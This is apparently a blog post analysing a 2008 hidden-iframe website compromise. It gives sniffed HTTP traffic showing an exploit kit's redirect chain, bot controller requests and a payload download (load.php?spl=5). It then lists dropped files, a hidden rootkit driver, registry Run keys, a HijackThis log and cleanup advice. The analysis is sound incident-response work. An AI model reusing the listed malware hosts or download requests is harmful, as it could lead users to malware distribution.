Website with hidden iframe and Malware Analysis
All began this morning (16/10/2008) at 13:00am, I checked the HTML code of index.php and I saw something suspicious inside. Our index.php and 4 other .php pages were infected with an iframe from 11:00am to 13:00am, and fortunately we analyze the code of our site every 2/3 hours, and immediatly removed the infected code.
I decided to analyze the iframe code and used an old version of Internet Explorer 6.0, unpatched to make sure I got infected. I visited that iframe and after a few seconds a massive malware infection started, and my computer started connecting to a lot of different IPs.
Here is result of the network traffic sniffed:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | GET /in.cgi?id111 HTTP/1.1 Host: fstat.cn Connection: Keep-Alive HTTP/1.1 302 Found Location: hxxp://mmcounter.com/tds/in.cgi?default GET /tds/in.cgi?default HTTP/1.1 Accept-Language: en-us Host: mmcounter.com Connection: Keep-Alive HTTP/1.1 302 Found Location: hxxp://lite.ff-freehosting.com/all/index.php GET /all/index.php HTTP/1.1 Host: lite.ff-freehosting.com HTTP/1.1 200 OK Content-Length: 7880 GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1 Host: 66.232.116.2 HTTP/1.1 200 OK Content-Length: 397312 Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2; Rnd: 983332 Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73 GET /all/load.php?id=45751&spl=5 HTTP/1.1 Host: lite.ff-freehosting.com Connection: Keep-Alive HTTP/1.1 200 OK Content-Disposition: inline; filename=load.exe Content-Length: 17475 GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1 Host: 66.232.116.2 HTTP/1.1 200 OK Content-Length: 397312 Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2; Rnd: 983188 Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150 Connection: close |
While internet traffic sniffer was active, the computer was infected with malware that was downloaded in Temp folder with the name winMN448Eewaoz.exe and after this file was executed, it dropped a file in C:\WINDOWS\system32\ with the name ~.exe, that was downloaded via this GET query:
1 | GET /all/load.php?id=45751&spl=5 HTTP/1.1 |
We can see the file load.php has a variable named spl with assigned the number 5 and we can assume it has loaded the payload for the exploit (aka sploit) number 5. Again we can assume this is an exploit kit that is serving more than 5 different exploits to infect an user.
Here is a small analysis of that malware activity:
- Downloaded in Temp Folder as winMN448Eewaoz.exe
- Copyed in C:\WINDOWS\system32\~.exe
- Injected code into svchost.exe
- Opened remote connections with IP 66.232.116.2 on port 80
After some time others files were downloaded in my system. I started Rootkit Unhooker and I noticed some suspicious drivers in the Driver List that made me think of a possible stealth malware or rootkit activity.
If you click properties on driver column of rnvrnrrv.sys you get the file is of 0 bytes… Why 0 bytes and no info on creation/modification etc. ?
The kernel driver rnvrnrrv.sys is loaded and hidden from explorer search (seems that the driver hides every file with name *rnvrnrrv*).
Below there are PE Import Table of rnvrnrrv.sys:
+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3
Here is a list of all created files by the malware (there is no order):
1 2 3 4 5 6 7 8 9 10 11 12 13 | C:\WINDOWS\msauc.exe C:\WINDOWS\system32\*randomnumber*.cpx C:\WINDOWS\system32\*randomnumber*.dat C:\WINDOWS\system32\wpv*randomnumber*.cpx C:\WINDOWS\system32\msansspc.dll %TempFolder%\winMN448Eewaoz.exe %ProgramFiles%\xeifh\SetActAdm.dll %ProgramFiles%\Internet Explorer\msansspc.dll C:\WINDOWS\system32\drivers\rnvrnrrv.sys C:\WINDOWS\system32\shell31.dll C:\WINDOWS\system32\fqqtiaag.tmp C:\WINDOWS\TDEZAALK.exe %AllUsers%\Application Data\almrahwt\mbqlmfin.exe |
The malware created following registry keys:
1 2 3 | HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i] |
This is a log file of HijackThis with the malware traces:
1 2 3 4 5 6 7 8 9 10 | Running processes: C:\WINDOWS\system32\wpv286.cpx %AllUsers%\Application Data\almrahwt\mbqlmfin.exe O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing) (SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing) |
What can we do if our website is infected ?
- Clean the infected HTML/PHP pages
- Change username and password to the FTP Account
- Change username and password to the Email Account
- Change username and password to the SSH
- Contact the server admin and explain your situation
- Check your PHP files for possible vulnerabilities
- Update all the installed software (blog, forum, etc)
- Remember to never make backups from the website to your PC
- Use always local backups for the website files
Leave a Reply